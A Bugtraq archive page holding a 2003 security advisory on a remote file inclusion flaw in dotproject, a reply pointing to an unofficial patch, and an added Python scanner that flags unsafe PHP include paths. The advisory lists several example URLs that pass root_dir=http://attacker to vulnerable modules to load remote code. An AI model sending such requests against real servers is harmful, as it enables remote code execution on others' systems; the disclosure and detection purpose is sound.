Bugtraq mailing list archives
Re: dotproject Remote Code Execution Vulnerability : Patch
From: "Frog Man" <leseulfrog () hotmail com>
Date: Wed, 29 Jan 2003 16:35:49 +0100
A non-official patch has been created for this hole and is published on http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=us (English version).
From: mindwarper () hush com
To: bugtraq () securityfocus com
Subject: dotproject Remote Code Execution Vulnerability
Date: Wed, 29 Jan 2003 04:02:24 -0800

dotproject Remote Code Execution Vulnerability (By Mindwarper)

<------- ------->

----------------------
Vendor Information:
----------------------

Homepage : http://www.dotproject.net
Vendor : informed
Mailed advisory: 28/01/03
Vendor Response : None

----------------------
Affected Versions:
----------------------

dev20030121

----------------------
Vulnerability:
----------------------

dotproject is a PHP+MySQL beta level web based project management and tracking tool
that dotmarketing started in Dec. 2000.

Inside the directory /modules/ multiple files try to include classdefs/date.php without
defining $root_dir first and allow remote attackers to inject their own
servers if globals are set on.

Example Code from modules/projects/addedit.php:

******
<?php
##
## Files modules: index page re-usable sub-table
##
require_once( "$root_dir/classdefs/date.php" );
$df = $AppUI->getPref('SHDATEFORMAT');
$tf = $AppUI->getPref('TIMEFORMAT');
******

As you can see nothing happens before the require_once function is called and therefore
with globals set on an attacker may include remote files.

Example:

http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker

this works also on

http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker
http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker
http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker

----------------------
Solution:
----------------------

Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /modules/ directory and that should block remote users from accessing it.

----------------------
Contact:
----------------------

Name: Mindwarper
Email: mindwarper () hush com
Website: http://mindlock.bestweb.net

<------- ------->
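For auditing a code tree for the pattern the advisory describes, the following is an added example and not part of either post or of dotproject: a heuristic scanner that reports include/require statements whose path uses a variable with no assignment earlier in the same file. The function names and the DEFINED_FIRST sample are constructed for illustration; findings need manual review because assignments made in other files are not tracked.

```python
import os
import re

# include/require[_once] statement; group 1 is the path expression up to ';'
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\b\s*\(?\s*([^;]*);', re.I)
VAR_RE = re.compile(r'\$([A-Za-z_]\w*)')
LINE_COMMENT_RE = re.compile(r'^[ \t]*(?:#|//).*$', re.M)
BLOCK_COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)

# The advisory's snippet (vulnerable) and a constructed variant that sets
# $root_dir itself before using it (an assumption, not the vendor's fix).
VULNERABLE = '''<?php
##
## Files modules: index page re-usable sub-table
##
require_once( "$root_dir/classdefs/date.php" );
$df = $AppUI->getPref('SHDATEFORMAT');
'''
DEFINED_FIRST = '''<?php
$root_dir = dirname(__FILE__) . '/../..';
require_once( "$root_dir/classdefs/date.php" );
'''

def unsafe_includes(php_source):
    """Return [(line, variable)] for include/require paths that use a
    variable with no assignment earlier in the same file."""
    # Blank out comments but keep newlines so line numbers stay correct.
    src = BLOCK_COMMENT_RE.sub(lambda m: '\n' * m.group(0).count('\n'), php_source)
    src = LINE_COMMENT_RE.sub('', src)
    findings = []
    for stmt in INCLUDE_RE.finditer(src):
        before = src[:stmt.start()]
        for var in VAR_RE.findall(stmt.group(1)):
            if not re.search(r'\$' + re.escape(var) + r'\s*=(?!=)', before):
                findings.append((before.count('\n') + 1, var))
    return findings

def scan_tree(root):
    """Yield (path, line, variable) for every .php file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.endswith('.php'):
                path = os.path.join(dirpath, name)
                with open(path, encoding='latin-1') as fh:
                    for line, var in unsafe_includes(fh.read()):
                        yield path, line, var

if __name__ == '__main__':
    print(unsafe_includes(VULNERABLE))
    print(unsafe_includes(DEFINED_FIRST))
```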